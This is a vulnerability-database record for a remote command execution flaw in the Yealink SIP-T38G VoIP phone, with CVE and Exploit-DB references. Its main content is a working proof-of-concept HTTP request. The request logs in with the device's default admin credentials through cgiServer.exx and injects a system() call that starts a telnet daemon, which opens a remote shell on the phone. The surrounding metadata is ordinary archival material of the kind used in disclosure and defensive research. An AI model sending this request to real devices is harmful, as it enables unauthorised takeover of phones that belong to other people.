ID
VAR-E-201406-0217
CVE
| cve_id: | CVE-2013-5758 | Trust: 2.1 |
| cve_id: | CVE-2013-5759 | Trust: 1.6 |
EDB ID
33741
TITLE
Yealink VoIP Phone SIP-T38G - Remote Command Execution - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Yealink VoIP Phone SIP-T38G - Remote Command Execution. CVE-2013-5759CVE-2013-5758CVE-108080 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | yealink | model: | voip phone sip-t38g | scope: | - | version: | - | Trust: 2.2 |
| vendor: | yealink | model: | voip phone sip-t38g remote | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758
Description:
Using cgiServer.exx we are able to send OS command using the system
function.
POC:
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
system("/bin/busybox%20telnetd%20start")
--
*Mr.Un1k0d3r** or 1 #*
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Command Execution
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
CREDITS
Mr.Un1k0d3r
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2013-5758 | Trust: 2.1 |
| db: | NVD | id: | CVE-2013-5759 | Trust: 1.6 |
| db: | EXPLOIT-DB | id: | 33741 | Trust: 1.6 |
| db: | EDBNET | id: | 55161 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 22335 | Trust: 0.6 |
| db: | EDBNET | id: | 22064 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 127096 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-5758 | Trust: 2.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-5759 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/33741/ | Trust: 0.6 |
| url: | https://0day.today/exploits/22335 | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 127096 |
| db: | EXPLOIT-DB | id: | 33741 |
| db: | EDBNET | id: | 55161 |
| db: | EDBNET | id: | 22064 |
LAST UPDATE DATE
2022-07-27T09:15:35.695000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 127096 | date: | 2014-06-13T13:53:43 |
| db: | EXPLOIT-DB | id: | 33741 | date: | 2014-06-13T00:00:00 |
| db: | EDBNET | id: | 55161 | date: | 2014-06-13T00:00:00 |
| db: | EDBNET | id: | 22064 | date: | 2014-06-14T00:00:00 |